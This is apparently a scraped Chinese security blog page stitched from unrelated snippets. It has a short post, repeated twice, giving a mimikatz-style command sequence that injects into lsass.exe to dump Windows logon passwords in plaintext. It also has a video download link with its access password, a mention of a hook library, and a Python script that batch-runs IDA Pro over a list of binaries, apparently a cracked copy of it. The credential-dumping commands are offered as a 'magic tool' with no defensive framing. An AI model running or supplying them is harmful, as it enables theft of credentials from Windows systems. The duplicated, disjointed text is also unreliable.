可以获取系统密码明文的神器,今天在看雪看到这个东西。文章内容就不转了,原文请参考这里!
获取密码的命令序列:
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords
可以获取系统密码明文的神器,今天在看雪看到这个东西。文章内容就不转了,原文请参考这里!
获取密码的命令序列:
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords
Click here to download these videos~(Access Password is :h4ckws)
Download link:http://dl.dbank.com/c0pem2gp75
一款比较强大的hook库,开源并且支持32位和64位。上图是官方提供的实例的测试效果。
#########################################
#Ida batch mode test code by obaby
#2012.03.13
#Mars Security
#http://www.h4ck.org.cn
#Email:root@h4ck.ws
#########################################
import sys
import os
import subprocess
# Fill these feilds with ur own ida file path and the idc file u want to execute!
idcScriptFileName = "batchmode.idc"
ida32qFilePath = '"F:\Crackl@b\Hex-Rays.IDA.Pro.Advanced.v6.1\ida61\idaq.exe"'
ida64qFilePath = "F:\Crackl@b\Hex-Rays.IDA.Pro.Advanced.v6.1\ida61\idaq64.exe"
ida32wFilePath ='"F:\Crackl@b\Hex-Rays.IDA.Pro.Advanced.v6.1\ida61\idaw.exe"'
ida64wFilePath = "F:\Crackl@b\Hex-Rays.IDA.Pro.Advanced.v6.1\ida61\idaw64.exe"
#The binary file list text
TargetList = "F:/Python 2.6/_eric4project/idabatchmode/list.txt"
TargetFile_object = open(TargetList, "r").readlines()
for eachline in TargetFile_object:
#print eachline,
#print eachline
eachline = eachline.replace('\n','').replace('\r', '')
if os.path.exists(eachline):
tmpExecStr = ida32wFilePath +" -A -c -S"+idcScriptFileName +" " + '"'+eachline+'"' #fixup the space in the file path
print tmpExecStr,
#os.system(tmpExecStr) #singl process with cmdwindow
#os.popen(tmpExecStr) singl process without cmdwindow
subprocess.Popen(tmpExecStr) #mulity process with cmd window
print ("All Process have been started!")
修正文件路径包含空格时找不到文件的问题,这个如果自己写的话应该是可以避免的。发现一个比较奇怪的问题,在win7下subprocess.Popen竟然不显示cmd窗口,但是在xp下显示。这是为什么? :8